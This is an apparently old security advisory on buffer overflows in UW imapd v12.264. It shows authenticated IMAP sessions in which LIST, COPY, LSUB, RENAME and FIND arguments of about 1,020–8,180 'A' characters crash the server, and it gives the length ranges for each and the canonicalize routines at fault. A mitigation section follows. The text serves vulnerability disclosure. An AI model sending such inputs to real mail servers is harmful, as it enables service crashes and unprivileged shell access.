COMMAND

    imapd

SYSTEMS AFFECTED

    imapd4r1 v12.264 (imap-4.7 package from the UW)

PROBLEM

    Michal Zalewski found following.  Newest RH:

        OK nimue IMAP4rev1 v12.264 server ready
        1 login lcamtuf test
        1 OK LOGIN completed
        1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()

    Privledges seems to be dropped, but, anyway, it's nice way to  get
    shell access  to mail  account, maybe  grab some  data from memory
    etc.   It  is  believed  both  imap  and  ipopd packages need code
    security audit.

    To segfault  the number  of A's  has to  in the  range 1023 < #A >
    8180.  If the command line including CR/LF is longer than 8192  an
    error message is  displayed.  The  segfaults are in  the nntp, mh,
    news  and   dummy  driver.    In   all  modules   the   subroutine
    <name>_canonicalize  will  happily  strcpy  and  strcat  the  user
    supplied   arguments   to   fixed   size   buffers  with  normally
    MAILTMPLEN = 1024 bytes. Older version, imap-4.5-4 seems to be ok.

    Here's another buffer overflow in imapd.  This time security  flaw
    exist in standard rfc 1064 COPY command:

        OK mail IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        select inbox
        2 EXISTS
        0 RECENT
        OK [UIDVALIDITY 956162550] UID validity status
        OK [UIDNEXT 5] Predicted next UID
        FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
        OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
        flags
        OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
        OK [READ-WRITE] SELECT completed
        copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

    No answer.   Process has been  killed by SIGSEGV.   Number of  A's
    must be in range  from 1017 to 8180.   After LOGIN all  privileges
    are dropped,  but we  still have  possibility to  get unprivileged
    shell access.  This was tested against WU imapd v10.223,  v11.241,
    v12.250, v12.261, and v12.264.

    Here  comes  yet  another  buffer  overrun  (3  ones).   This time
    affected commands are LSUB, RENAME and FIND:

        OK mail IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)

        SIGSEGV received.

        OK localhost IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)

        SIGSEGV received.

        OK localhost IMAP4rev1 v12.264 server ready
        login siva9 secret
        OK LOGIN completed
        find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)

        SIGSEGV received.

    It seems that all two-argument commands in authenticated state -
    where second argument is string - are vulnerable.  ipop2/3d works
    fine in all states, also in transaction state.

SOLUTION

    1) Deinstall the imap-uw  port/package, if you you  have installed
       it.
    2) If  you do  not specifically  require imap  functionality (i.e.
       pop2/pop3  is  sufficient)  then  disable  the  imap  daemon in
       /etc/inetd.conf  and  restart  inetd  (e.g.  with  the  command
       'killall -HUP inetd')

    Unfortunately the vulnerabilities in imapd are quite extensive and
    no patch is  currently available to  address them.   There is also
    no  "drop-in"  replacement  for  imap-uw  currently  available  in
    ports, although the mail/cyrus  port is another imap  server which
    may be a suitable replacement.  Cyrus has different  configuration
    and operational requirements than imap-uw however, which may  make
    it unsuitable for many users.

    Until a security audit of the imap-uw source can be completed  and
    the vulnerabilities patched, it  is recommended that operators  of
    "closed" imapd servers take steps to minimize the impact of  users
    being able  to run  code on  the server  (i.e., by  tightening the
    local security on the machine to minimize the damage an  intruding
    user can cause).